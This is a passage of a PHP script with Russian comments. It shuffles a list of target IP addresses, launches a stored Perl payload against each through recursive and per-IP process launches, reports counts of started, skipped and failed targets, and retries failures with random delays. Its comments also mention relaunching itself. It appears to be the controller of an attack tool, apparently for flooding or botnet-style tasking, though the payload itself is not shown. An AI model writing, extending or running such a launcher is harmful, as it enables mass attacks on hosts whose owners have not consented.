        $ips[] = $ip;
    }
}

// СЛУЧАЙНЫЙ ПОРЯДОК КАЖДЫЙ РАЗ
// Используем микросекунды для seed
srand((int)(microtime(true) * 1000000) % 1000000);
shuffle($ips);

// Дополнительное перемешивание для максимальной случайности
$count = count($ips);
for ($i = 0; $i < $count; $i++) {
    $j = rand(0, $count - 1);
    $temp = $ips[$i];
    $ips[$i] = $ips[$j];
    $ips[$j] = $temp;
}

// Статистика
$stats = array(
    'started' => 0,
    'skipped' => 0,
    'failed' => 0,
    'total' => $count
);

// Запускаем рекурсивно
recursive_launch($ips, $perl_code, $stats);

// ВЫВОД РЕЗУЛЬТАТА
$result = array(
    'status' => 'complete',
    'stats' => $stats,
    'time' => time(),
    'order' => 'random_' . (rand(1000, 9999))
);
echo json_encode($result);

// ================= АВТО-ПОВТОР =================
// После завершения можно автоматически запустить себя снова
// с другими IP или через некоторое время

// Пауза перед возможным повторным запуском
usleep(rand(2000000, 5000000)); // 2-5 секунд

// Опционально: автоматический рестарт для неудачных
if ($stats['failed'] > 0 && $stats['failed'] < $count) {
    // Создаем массив только неудачных IP
    $failed_ips = array();
    foreach ($ips as $ip) {
        if (!is_already_running($ip)) {
            $failed_ips[] = $ip;
        }
    }

    // Если есть неудачные - пробуем еще раз
    if (!empty($failed_ips)) {
        shuffle($failed_ips);
        $retry_stats = array('started' => 0, 'skipped' => 0, 'failed' => 0);

        foreach ($failed_ips as $ip) {
            for ($attempt = 0; $attempt < MAX_RETRIES; $attempt++) {
                if (launch_process($ip, $perl_code)) {
                    $retry_stats['started']++;
                    break;
                }
                usleep(rand(MIN_SLEEP, MAX_SLEEP));
            }
            if ($attempt >= MAX_RETRIES) {
                $retry_stats['failed']++;
            }
            usleep(rand(MIN_SLEEP, MAX_SLEEP));
        }

        // Дополнительный вывод в лог
        @error_log("ULTIMATE Auto-retry: " . json_encode($retry_stats));
    }
}

// Завершаем работу
exit;
?>